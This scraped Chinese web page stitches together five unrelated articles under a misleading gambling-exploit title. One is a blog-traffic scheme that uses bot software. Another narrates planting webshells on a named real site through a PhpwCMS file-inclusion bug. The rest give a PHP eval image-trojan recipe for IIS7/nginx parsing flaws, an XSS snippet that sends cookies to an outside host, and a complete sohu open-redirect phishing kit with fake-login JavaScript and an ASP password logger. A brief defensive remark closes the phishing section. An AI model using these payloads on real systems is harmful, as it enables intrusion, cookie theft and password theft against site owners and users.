61阅读

利用博彩网站漏洞赚钱-利用博客赚钱的全过程

发布时间:2017-11-29 所属栏目:discuzx3.1漏洞利用

一 : 利用博客赚钱的全过程

  这节课程是我通过博客赚钱的全过程。但是在赚钱的同时。首先要知道博客如何才能高访问量,可以靠什么原理能让博客高访问量等多种方法。使你博客能高访问量并且能为自己的网站提升知名度。及高访问量首先有一组数据:

  一些大型网站的博客的访问量均在日百万的访问量。有的竟达到千万访问量如新浪博客。单单首页日访问量均在500万左右。 或许还比这个数高看到这组数据不感到惊讶吗?

  有写朋友会问到。博客首页这么大量啊。如果我在首页加一个连接。那么我每天不也有几千的访问量么?这个没有错。新浪首页中每篇文章日访问量均在20万左右,每篇文章均有20万的浏览量。当你看到这个20万时候。你会不会想。如果我加一个我的连接。那么。我的站不就也有很多的流量过来么?

  细细思考下这个问题。

  我为什么不建立一个博客呢?如果我的文章被新浪推荐为首页文章的话。那不就大发特发了?首页浏览量——博客文章浏览量——我的站的浏览量3个阶级。如何把他灵活应用呢?也就是如何把这3项做为一条连接桥接起来呢?

  也许有些朋友也知道使用软件把这个连接给桥接起来,桥接起来后是如何把他转换为自己的流量呢?这就是今天我们的话题核心。

  根据上述核心提示,我们使用一套完整的体系来建立,这个博客赚钱的连接。

  1、建立一个博客

  2、使用辅助软件进行桥接

  3、维护博客

  4、挑选合适的广告联盟

  5、调整博客及广告

  我们按照上述五条进行一 一讲解

  1、建立博客

  博客建立基础为每日老百姓最关注的。最热门的拥有自己网站的朋友。也有很多不知道怎么做网站优化,把博客针对网站优化。稍微讲一点。你也可以按照此方法进行操作。拿我作过的一个简单的案例来讲。H动漫 这个关键词。我建立博客,名字及博客名都是H动漫,建立好之后,在我的博文里写的是,随便自己写的一些内容。不过呢,我的内容均是语句通顺的哦。在文章里拥有这个关键字,并且用其他颜色和不同的字体格式表现了出来。

  这个博客我在3个知名博客网站上建立了,然后通过使用辅助软件,在3个博客上使用了桥接,没有2天GOOGLE关键词查询中,这个在首页以上H动漫仅为小插曲。请大家借鉴,建立这个博客。不仅仅可以达到优化网站的功能。同时也可以给自己博客带来高访问量,大家应该知道这些知名的博客对搜索引擎非常友好。而且权重非常高。不瞒大家。我曾经在某知名博客网站中。做过一个博客。4小时后,在百度搜索这个博客的博客名称。竟搜索的到此博客。

  下面谈我们的博客的桥接到我们网站的技巧

  挑选我们网站自己觉得比较使人感兴趣的文章及图片,在我们的博客上做连接桥接到我们的网站上,具体做法,可以使用你的博文进行桥接,当你写完一篇博客文章后。在文章结尾下添加更多文章。或者深度阅读。等引人注意的字眼。等让更多朋友在看完你的博客文章后有更多的文章可以观看,这是一种桥接方法。

  另外一种桥接方法。是在你的博客中。有一些可以加广告连接。图片等信息的。如新浪博客。有一个新建模块的功能,这个功能既可以加入图片。也可以加入文字连接,这些连接,可以是你网站里拥有的内容。也可以是其他,这个主要是在于建立博客者自己心理所想的内容。

  2、使用辅助软件进行桥接

  如何使用软件进行桥接呢,现在网络上出现了很多针对博客的软件,我在这里就不一一讲了,软件的工作原理大同小意,使用软件登陆自己的博客帐号---进行博客文章进行一篇篇踩,这就是现在的软件的工作原理,没有什么更大的秘密,辅助软件就是我们获得流量的基础,如果没有辅助软件,那么就很难让你的博客访问量更高。让你的网站流量更大。优化更好。

  3、维护博客

  其实维护博客也是一个漫长的时间,有些朋友并没有那么多的时间去维护博客,对于我们利用博客赚钱并不是去维护文章等内容,而是去维护博客上所有的广告及连接,并为次博客添加一篇接近网民比较赶兴趣的文章。从而达到。我们的博客有更多的人访问的目的。

  4、挑选合适的广告联盟

  在自己的网站上添加的广告很多都是广告联盟上的广告,我们所要做的广告应该是和你博客上的内容比较接近的广告。这样的话方便,会让你的广告收入增加。

  5、调整博客及广告

  这点比较重要,一个博客的的访问量,是我们的博客名称来决定的,首先你要确定你的博客需要的是什么样的流量。比如,你的网站是搞医药的网站,那么你肯定会建立写相关医药的博客从而达到提升你网站流量的效果。

  现在,我们拿上述一个方法来进行操作步骤讲解,我拿出自己的网站来一一讲解,首先介绍下我的网站,我的网站是一个视频网站,我在建立的博客为比较热门的上升最快的一些视频进行建立博客,如:珠光宝气

  我在建立博客的时候就填写的是:珠光宝气,然后我通过寻找珠光宝气相关文章增加此博客的文章。并在每一篇文章上方放置一张相关的图片。此图片加入,自己网站上此视频的连接。

  并在其下方写上“观看此视频请点图片”在文章中寻找一个比较靠前的:珠光宝气 进行加入超连接至我的网站上此视频的连接新浪的博客上有这样一个功能,加入新模块,模块可以使用自定义的连接图片信息,那么这点我们也不能放过,加上一些相关内容的广告。一般上我都提前做好了代码,建立博客后首先加入这些代码,然后进行博文添加,建好此博客后,我们要做博客于其他博客主,博文进行桥接,我们使用软件进行桥接,我使用的一款软件有这样的一些功能:

  访问

  博客 博文 混合 等功能

  博客。就是博客主于博客主之间的访问。

  博文既是。博客主与博文之间的桥接。

  现在我就这几个桥接。给大家发出来某个知名博客的桥接点

  博客主于博文之间的桥接点

  如图

  

 

  这是你的博客与博文之间的桥接点

  

 

  这是博客主于博客主之间的桥接点。

  软件均是大同小意,都是通过这些桥接点进行的,还有一处桥接点。是每篇博客文章的评论,这个就不需要我发截图了,软件开启后。每分钟会让我的博客在上千个桥接点显示我的头像及我的博客名称。

  我现在给大家发下截图。可能让大家更直观的看到网站的流量图,然后在给大家看看一个博客的来访量。

  

 

  这是博客主的回访频率,也是我的博客上的访客,也是于其他博客主的桥接点,我在给大家看看我每刷新后的博客访问量:

  

 

  刷新下看看

  

 

  这里就是软件桥接后的博客流量,再给大家看一组图,是CNZZ的统计图

  

 

  现在发的图是我建立的博客中流量来源的其一这是今日来访问我的网站其中一个新浪的博客,请原谅其中被摸掉的数字。

  通过我讲的5条规则,还进行了广告联盟中的赚钱的数目,这样大家更清楚的利用此方法进行后可以获得多少的利润。

  下面发一组广告联盟实时的截图

  

 

  对博客赚钱比较感兴趣的朋友可以加入群:61773770

  东晓提醒您:软件大同小意,主要是方法正确,希望大家都能赚到钱,大家多研究方法并不是在研究软件,软件只是一个辅助软件,重要的在于思路问题,战友们打起精神来,调整自己做站赚钱的思路啊,最终是大家都能赚到钱,这是最根本的,大家在互连网上打拼,还不都是为了钱,我对文章并不会写太多。希望此节课。能给大家带来很多实用的地方。欢迎对本课程进行批判。

二 : 学习利用文件包含漏洞进行网站入侵

一、看见漏洞公告

  最近想学习一下文件包含漏洞,在无意中看见了关于文件包含的漏洞公告。大致的意思是这样的,PhpwCMS 1.2.6系统的下列文件存在文件包含漏洞:include/inc_ext/spaw/dialogs/table.php

  include/inc_ext/spaw/dialogs/a.php

  include/inc_ext/spaw/dialogs/colorpicker.php

  include/inc_ext/spaw/dialogs/confirm.php

  include/inc_ext/spaw/dialogs/img.php

  include/inc_ext/spaw/dialogs/img_library.php

  include/inc_ext/spaw/dialogs/td.php

  文件中的$spaw_root的没有过滤的情况下,包含’**class/lang.class.php’。具体的代码公告中没给出来。可以利用下面的url利用此漏洞,http://website1/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://website2/,其中website1是有漏洞的网站,website2是攻击的网站,website2所在的目录下有class/lang.class.php文件。

  二、学习的第一天

  马上行动,我用google搜索inurl:"phpwcms/index.php?id=",搜索到54,800多项结果,基本上都是国外的。看来这次发了,这次国外的wenshell肯定是一大堆了。呵呵……,嘿嘿……随便点击一个网站,是美国的:http://arena-sv.jans-webdesign.com,不知道这个网站有没有漏洞。我用http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.baidu.com/检测,当然http://www.baidu.com/class/lang.class.php是不存在的,这时页面显示如图一所示,提示没有找到页面。这表明了这个网站存在文件包含漏洞,象这样的有漏洞的网站随便点击一个就是。

  检测出有文件包含漏洞

  现在开始利用这个漏洞,在我的支持asp网站根目录建一个class的目录,在class里面建lang.class.php文件。但是当我用浏览器浏览http://www.xxxx.xx/class/lang.class.php的时候,提示找不到文件。难道是我的网站所在的服务器没设置好吗?我试着找到了几个webshell,浏览的时候还是出现找不到文件的问题。

三、学习的第二天

  去搜索的发现有漏洞的网站变得比较少了,大部分的网站都被漏洞补了,还有一部分美国的网站上被挂了一些与反战争有关的图片或者一些国旗。还好的是昨天的哪个网站没有被人家黑掉,还有机会学习。我在无意中得到了jsp的wenshell,试着写了一个php文件,在浏览器浏览的时候出现的是源文件。看来现在现在可以利用这个jsp的webshell来作跳板。

  在webshell里面建一个class的文件夹,然后在class目录里面上传一个lang.class.php空文件,在文件里面写上.在浏览器上浏览http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/class/lang.class.php, 显示的就是, 然后提交http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/,/是/的意思。

  php环境信息

  编辑lang.class.php的文件,先写了一个phpspy。但是登陆webshell的后,页面转到其他的页面。还是先传一可以上传的文件的马儿吧,传了一个国外的php木马,木马的功能很的大,浏览http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/。

  包含的国外php木马

  但是这个国外的php马还是上传一个经过修改的phpspy吧,用着舒服一点,上传得文件改为了imge.php,现在访问http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/imge.php?cuit=6305,登陆后一台webshell就在我们的眼前了。权限也不错,但是由于是linux系统,也不知道怎么去提权,还是再放一下吧!

  phpspy上传成功

  四、学习的第三天

  对linux下的提权一点都不了解,没办法只有寻求帮助了。Jinsdb师兄叫我去一些好的网站找一下exp看看,他还告诉我了上次在我的网站中的php文件浏览的时候是找不到文件的原因:因为我的系统是2003的,所以要在IIS的ISAPI 筛选器中加.php后缀,在xp下访问php文件直接就可以浏览。看来上次我得到的服务器基本上是2003的。

  看来这次的学习也蛮有意义的!发现一点,国外的网站的管理人员比较重视安全。在出现漏洞的第二天,很多网站都把漏洞补了,还有的网站被入侵后能马上发现,并及时清除了webshell。

三 : IIS 7.0 网站漏洞利用及修复方法

以目前流行的PHP为例:

先合并一张PHP一句话图片马,合并方法:
①、DOS合并:copy 1.gif /b + 1.txt/a php.gif
②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为<?php eval($_POST[meckun]);?>

图片随便找一张.
【顺带着说一下edjpgcom的使用方法:打开edjpgcom.exe所在文件夹,然后把你所要修改的图片拖动到edjpgcom.exe上面,然后edjpgcom.exe会自动打开,写入想要些的代码即可。
一句话:
<?php eval($_POST[meckun]);?>

然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。
找到图片地址,然后在地址后面加个xx.php,在浏览器中运行。
比如假设图片地址为www.meckun.cn/upload/1.jpg
则执行地址为www.meckun.cn/upload/1.jpg/xx.php
然后,会在目录下生成xx.php。比如:www.meckun.cn/upload/x.php
x.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。

找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。

在图片格式后面添加xx.php
注:xx随便你怎么填。只要后缀为.php就好

四 : Zblog最新跨站漏洞及利用代码

  Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向

  xmlhttp=poster();

  cookie=document.cookie;

  login=cookie.indexOf(‘password’)==-1?0:1;

  tolocation=’http://www.61k.com/’;

  //get cookie

  x=new Image();

  x.src=”www.dosjj.com/c.php?c=”+escape(document.cookie);

  //get a shell

  data=”txaContent=

五 : 利用sohu网站URL跳转漏洞欺骗邮箱密码

url跳转漏洞遍布各大网站,简单看一下,THE9、sohu等居然都存在这个漏洞!我们就拿sohu为例,讲一下该漏洞。来到sohu的用户注册页面,可以看到,在IE地址栏里,默认写着http://passport.sohu.com/web/signup.jsp?appid=1000& ru=http://login.mail.sohu.com/reg/signup_success.jsp。

这串字符中的“signup_success.jsp”页面是做什么的呢?反正sohu免费注册,我们来试一下。原来注册成功后,跳转到了这个页面。如果这个地址是其他地方的呢?现在改掉地址栏地址,替换为IT168安全频道的首页:http: //passport.sohu.com/web/signup.jsp?appid=1000&ru=http://safe.it168.com/,然后开始注册。

最后居然跳到了IT168安全频道的首页了。

sohu原本的注册流程是这样的:注册--处理注册信息--注册成功--跳转到成功页面--点页面链接自动登录--登录后跳转到mail.sohu.com。
而跳转后的页面我们可以控制,所以流程可以被我们改为:注册--处理注册信息--注册成功--跳转到伪造的登录页面--用户输入密码点登录--提交密码给我们--最后跳转到mail.sohu.com。
下面按照修改后的流程注册。
首先准备好工具,一个伪造的sohu登录页面(欺骗用),一个ASP页面(接收发来的密码并保存)。打开mail.sohu.com,照原样复制一份HTML源代码,为了让用户更容易受骗,还要在登录口写上“请登录”字样(过程见下文)。

因为sohu在登录的地方使用了自己的控件,看不到登录框的代码,操作登录的元素就比较麻烦了,还好微软提供了Ietoolbar这个IE的插件,可以看到sohu登录控件的名称,等登录控件加载完成,就可以对他进行操作了。

从抓包的数据中可以看出这个控件使用了AJAX,不知道他在页面触发AJAX的函数是什么,可能是onclick()也可能是别的,在写代码的时候必须保证让sohu的登录代码在我们提交密码到自己的asp页面(用来保存密码的页面)之后执行。无论他的函数是什么,我们都可以拦截,使用JS函数劫持技术,其实就是面向对象语言中的“方法重写”技术。

a.html代码(伪造的登录页面):
........................
</body>
</html>(一直到页面结束的标签)
.....................上面是mail.sohu.com页面的代码,.................
. 我们要加的代码从下面开始, 把“ajaxurltmp”的值改为asp文件的地址:
<script>
var ajaxurltmp = "http://safe.it168.com/a.asp";
//-------------以下为AJAX执行部分
var xmlHttp;
function createXMLHttpsss(){
if(window.XMLHttpRequest){
xmlHttp = new XMLHttpRequest();
}
else if(window.ActiveXObject){
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
}
}
function startRequest(doUrl){
createXMLHttpsss();
xmlHttp.onreadystatechange = handleStateChange;
xmlHttp.open("GET", doUrl, true);
xmlHttp.send(null);
}
function handleStateChange(){
if (xmlHttp.readyState == 4 ){
if (xmlHttp.status == 200 ){
//停一秒,为了让另一个AJAX(登录的那个)有时间执行。最后跳转。
setTimeout("hrefgo()",1000);
}
}
}
function hrefgo()
{
location.href = 'http://mail.sohu.com/';
}
//----------------------------以上为AJAX执行部分
//在点登录的时候执行
var formrrr = document.getElementById('ppcontid');
var lgin = formrrr.childNodes[0].childNodes[3].childNodes[1];
lgin.onclick=function(){
alert('aaa');
}
var lgonclick = lgin.onclick;
lgin.onclick = function(){

var time = Math.random();
var strPer = ajaxurltmp '?
username=' document.getElementById('ppcontid').childNodes[0].childNodes[1].childNodes[1].value;
strPer =
'&password=' document.getElementById('ppcontid').childNodes[0].childNodes[2].childNodes[1].value '&time=' time;
startRequest(strPer);
lgonclick();
}
document.getElementById('pperrmsg').innerHTML='注册成功!请登录!';
//在点登录的时候执行
</script>

相关重要代码解释(JS函数劫持部分):
var lgin = formrrr.childNodes[0].childNodes[3].childNodes[1]; //这里获取”登录“这个按钮。
var lgonclick = lgin.onclick; //先把登录的方法赋给一个变量(这个变量其实是个方法)。
lgin.onclick = function ()
{
。。。。。我的代码,用来调用AJAX给ASP文件发密码(在这里拦截)
lgonclick(); //原来的代码
}
注意在HTML代码里把”safe.it168.com/a.asp“替换为你自己的ASP文件地址。
asp文件的代码:
<%
kxlzxfile=Server.MapPath("kxlzx.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set file=fs.OpenTextFile(kxlzxfile,8,True,0)
file.WriteLine("用户名:"&Request.QueryString("username")& "")
file.WriteLine("密码:"&Request.QueryString("password")& "")
file.close
set fs = nothing
%>

很简单的代码,接收到密码后生成一个kxlzx.txt文件,保存密码。把伪造的登录页面a.html(地址为http: //safe.it168.com/a.htm)和保存密码的页面a.asp(地址为http://safe.it168.com/a.asp)上传至一个asp空间里。

现在执行以下我们的流程,首先,打开注册的地址“http://passport.sohu.com/web/signup.jsp?appid= 1000&ru=”,注册用户“kxlzxtest”,密码为“testtest”,然后提交。

注意看IE地址栏,已经来到了伪造的登录页面,输入密码登录。正常登录,进了邮箱里。

现在查看kxlzx.txt,果然有被盗取的密码!整个伪造的过程就是这样,让用户在不知不觉中上当。

做为普通上网用户,我们不要轻信任何人给出来的网页链接,即使是朋友(因为他也可能是受害者)。而做为程序员更应该注意,当你在设计程序时,尽量不要让用户参与控制流程,特别是敏感的地方。可以想象sohu的这段流程设计本意是为了和其它程序配合,让用户注册后直接跳转。但是由于没有检查来源,也没有检查 post给注册程序的链接是否是sohu自己的页面,最终导致了URL欺骗的形成。而这种漏洞在各大网站泛滥,例如九城的登录地址“https: //passport.the9.com/login.php?redurl=http://safe.it168.com”等,如果被人利用,最终会造成很严重的后果。
本文标题:利用博彩网站漏洞赚钱-利用博客赚钱的全过程
本文地址: http://www.61k.com/1076912.html

61阅读| 精彩专题| 最新文章| 热门文章| 苏ICP备13036349号-1